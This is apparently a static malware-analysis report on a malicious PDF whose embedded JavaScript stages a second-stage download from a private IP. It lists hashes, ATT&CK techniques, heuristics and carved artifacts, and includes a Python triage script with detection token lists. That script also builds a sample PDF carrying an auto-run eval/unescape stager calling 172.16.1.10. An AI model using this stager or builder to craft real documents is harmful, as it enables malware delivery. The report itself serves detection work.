Malicious PDF — malware analysis report

Static analysis result for SHA-256 33dfee7020b9540d…

Verdict: MALICIOUS
File type: PDF
Size: 1.95 MB
Created: 2011-72-51 03:25:00 (as recorded in the document metadata; month 72 / day 51 is not a valid calendar date)
Authoring application: Writer (via OpenOffice.org 3.0)
MD5: b19065ee00ab89ffbcfaf48fc2828196
SHA-1: 936065771ac438e8a32bdf5d7a7017270ee01437
SHA-256: 33dfee7020b9540dedd6bc6728fe98a7c5c669e38402ba17e2c2e63e46759e45
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains embedded JavaScript that uses eval() to run obfuscated code. Static triage of the carved script indicates it stages the download and execution of a second-stage payload from http://172.16.1.10/. JavaScript execution paired with a download URL that names a raw IP address rather than a domain is a strong indicator of malicious intent. One caveat for responders: 172.16.1.10 lies in the RFC 1918 private range (172.16.0.0/12), so the stager can only reach its payload from inside a network that hosts that address (an internal staging host or lab infrastructure); it should not be treated as an internet-facing C2 indicator. The document also pairs that outward action with parser-evasion structure (object or xref inconsistencies on which parsers disagree), which further points to deliberate hostile construction.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9779

Heuristics (8)

  • PDF_JS_EXPLOIT_CLUSTER (critical): PDF JavaScript exploit cluster
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF_EVAL (high): eval() call
    eval() found (matched inside a decoded stream); it is commonly used to execute obfuscated exploit code.
  • PDF_ACTION_PARSER_EVASION (high): Clickable PDF combines external action with parser-evasion structure
    PDF has an external clickable URI together with object graph or xref structures that make parsers disagree, such as divergent duplicate objects, parser divergence, or xref offset mismatch. That combination is stronger than a plain link: the document is both an outward-action carrier and a parser-confusion/evasion sample.
  • PDF_URI_IP_LITERAL (medium): Clickable URI points to raw IP address
    PDF contains a clickable HTTP(S) action whose host is a literal IPv4 address. Legitimate documents normally link to named domains; raw-IP destinations are common in disposable phishing and malware-delivery infrastructure.
  • PDF_JAVASCRIPT (low): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS (low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • EXTRACTED_FILE_STATIC_TRIAGE (info): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted:
    • http://172.16.1.10/
    • http://172.16.1.10
    • http://www.ascendercorp.com/
    • http://www.ascendercorp.com/typedesigners.html
    • http://www.ascendercorp.com/liberation.html
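The checks behind the heuristics above, and the evidence the summary draws on, as an added worked example that is not the scanner's code: a minimal Python static triage run against a constructed in-memory PDF. It locates /JS streams referenced from a /JavaScript action, inflates FlateDecode streams, counts exploit-staging tokens before and after %XX decoding (the reason PDF_EVAL reports a match "inside a decoded stream"), extracts URLs with a raw-IP / RFC 1918 label, and compares xref offsets with the real object offsets (the xref-offset-mismatch signal from PDF_ACTION_PARSER_EVASION). The sample PDF's object layout, its script text, the two URL variants and the app.launchURL token are assumptions made for this example; the object scan is regex-based rather than a full PDF parser.

```python
import ipaddress
import re
import zlib
from urllib.parse import unquote_to_bytes

# Staging tokens named by PDF_JS_EXPLOIT_CLUSTER, plus app.launchURL (Acrobat's URL hand-off).
DANGEROUS = (b"eval(", b"unescape(", b"fromCharCode", b"app.launchURL")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")
# Constructed script: "app" is %XX-encoded, so app.launchURL is only visible after unescape().
SAMPLE_JS = b"eval(unescape(\"%61%70%70.launchURL('http://172.16.1.10', true)\"));"


def build_sample_pdf(corrupt_xref: bool = False) -> bytes:
    """Constructed PDF: /OpenAction runs a deflated /JS stream, a link /URI targets a raw IP.
    corrupt_xref shifts every xref offset so xref-trusting and scanning parsers disagree."""
    js_stream = zlib.compress(SAMPLE_JS)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /Annots [6 0 R] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(js_stream)
        + js_stream + b"\nendstream",
        b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (http://172.16.1.10/) >> >>",
    ]
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % (off + 7 if corrupt_xref else off)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_pos)
    return bytes(out)


def iter_objects(pdf: bytes):
    """Yield (number, header offset, body) by scanning for 'N G obj ... endobj'."""
    for m in OBJ_RE.finditer(pdf):
        yield int(m.group(1)), m.start(), m.group(3)


def decoded_streams(pdf: bytes) -> dict:
    """Object number -> stream bytes, inflating FlateDecode; carves by the declared /Length."""
    out = {}
    for num, _, body in iter_objects(pdf):
        start, length = re.search(rb"stream\r?\n", body), re.search(rb"/Length\s+(\d+)", body)
        if not start or not length:
            continue  # no stream, or an indirect /Length (not handled in this example)
        data = body[start.end(): start.end() + int(length.group(1))]
        if b"/FlateDecode" in body[: start.start()]:
            try:
                data = zlib.decompress(data)
            except zlib.error:
                pass  # keep raw bytes; hostile files may corrupt streams deliberately
        out[num] = data
    return out


def javascript_streams(pdf: bytes) -> dict:
    """Streams reached through a /JS reference: the PDF_JS / PDF_JAVASCRIPT surface."""
    refs = {int(m.group(1)) for m in re.finditer(rb"/JS\s+(\d+)\s+\d+\s+R", pdf)}
    return {n: d for n, d in decoded_streams(pdf).items() if n in refs}


def suspicious_tokens(script: bytes) -> list:
    """Staging tokens present as written or after one %XX decode (what unescape() yields)."""
    view = script + b"\n" + unquote_to_bytes(script)
    return sorted({t.decode() for t in DANGEROUS if t in view})


def host_label(url: str) -> str:
    """PDF_URI_IP_LITERAL: raw-IP host, further split by RFC 1918 membership."""
    host = url.split("//", 1)[1].split("/", 1)[0].split(":", 1)[0]
    try:
        return "ip-literal-private" if ipaddress.ip_address(host).is_private else "ip-literal-public"
    except ValueError:
        return "named-host"


def extract_urls(pdf: bytes) -> dict:
    """URL -> (channel, host label): 'body' = raw object graph, 'js' = decoded script only."""
    sources = [("body", pdf)] + [("js", unquote_to_bytes(s)) for s in javascript_streams(pdf).values()]
    found = {}
    for channel, blob in sources:
        for m in URL_RE.finditer(blob):
            url = m.group(0).decode("latin-1")
            found.setdefault(url, (channel, host_label(url)))
    return found


def xref_mismatches(pdf: bytes):
    """Objects whose xref offset disagrees with the scanned header offset; None without a table."""
    at = pdf.rfind(b"\nxref\n")
    header = re.match(rb"\nxref\n(\d+) (\d+)\n", pdf[at:]) if at >= 0 else None
    if not header:
        return None
    first, count = int(header.group(1)), int(header.group(2))
    entries = re.findall(rb"(\d{10}) (\d{5}) ([nf])", pdf[at + header.end():])[:count]
    actual = {num: off for num, off, _ in iter_objects(pdf)}
    return [first + i for i, (off, _gen, kind) in enumerate(entries)
            if kind == b"n" and actual.get(first + i) != int(off)]
```

Run it against a real sample with `pdf = open(path, "rb").read()` and then `javascript_streams(pdf)`, `extract_urls(pdf)` and `xref_mismatches(pdf)`. The scan deliberately ignores the xref table when locating objects, which is what lets the last check expose an offset mismatch. It handles only classic xref tables, direct /Length values and FlateDecode, so on real files it belongs beside a full parser (object streams, xref streams and other filters are out of scope here).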

Extracted artifacts (8)

Files carved from inside the sample during analysis.

Filename                        Kind                    Source                                        Size
javascript_obj0001_000.js       pdf-javascript-stream   PDF /JS object 1 at offset 0x610B             538 bytes
    SHA-256: 1db8460db841eacf06b80da2c08969bf2b2f3adde35b2d0ca91bcb7f6750d6c8
    Detection: ClamAV: No threats found. Obfuscation or payload: likely; the carved artifact contains 1 eval/decoder/string-building token.
font_00_sfnt_off0004e31c.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x4E31C    10840 bytes
    SHA-256: 77d0fc6988188759e3b29bb709b47e59013d93db4d8e6b458e257a6f6f7a392b
font_01_sfnt_off000502ff.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x502FF    23748 bytes
    SHA-256: 747e5fe417574fc568eea0a84112eeceb371a1a4dd3b0b702f52ac75e12896ff
font_02_sfnt_off0005451d.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x5451D    46812 bytes
    SHA-256: 62985b917b9ba3e49bb34f6e82f474b8f2850307b1fc1417a51c4781b8f5f7fd
font_03_sfnt_off0005bbd7.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x5BBD7    34780 bytes
    SHA-256: 798c8b83cefbbbe0ef3343074988772ee8e26ec0a470e4473af4456ed291887a
font_04_sfnt_off00061584.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x61584    21772 bytes
    SHA-256: c2f214f83e3b7c53a4de47c4c8b7a4299b26e4b7c5c42ae2a5cff30b48a1a474
font_05_sfnt_off000651c1.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x651C1    30596 bytes
    SHA-256: 65067a5fb081667384ffa828548e6b993384c6fa15cdfbaf76c8f68f70843c66
font_06_sfnt_off0006a370.bin    pdf-font-stream         PDF embedded font (sfnt) at offset 0x6A370    24588 bytes
    SHA-256: 7ad3e7562deae03753c97f79cb2a8a39213fd0dbbc04dffce5f13fc4d0a37383